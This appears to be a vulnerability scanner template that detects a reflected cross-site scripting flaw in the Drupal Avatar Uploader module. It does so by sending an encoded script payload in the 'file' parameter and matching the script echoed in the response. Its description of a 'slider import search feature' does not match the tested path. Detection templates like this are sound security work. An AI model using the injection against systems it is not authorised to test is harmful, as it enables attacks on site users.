id: drupal-avatar-xss

info:
  name: Drupal Avatar Uploader - Cross-Site Scripting
  author: bywalks
  severity: high
  description: |
    Drupal Avatar Uploader v7.x-1.0-beta8 plugin contains a cross-site scripting vulnerability in the slider import search feature and tab parameter via plugin settings.
  reference:
    - https://www.exploit-db.com/exploits/50841
    - https://packetstormsecurity.com/files/166409/Drupal-Avatar-Upload-7.x-1.0-beta8-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,drupal,edb,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<div><script>alert(document.domain)</script></div>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203e6d4bf28adb0c669d5ca90652787ad3df5c927c46ff2628df84604002c5f0bf022100ed6b43352d1ad3a6ef8114966f50d6b6a184573c780548cf32d3b95db817f2aa:922c64590222798bb761d5b6d8e72950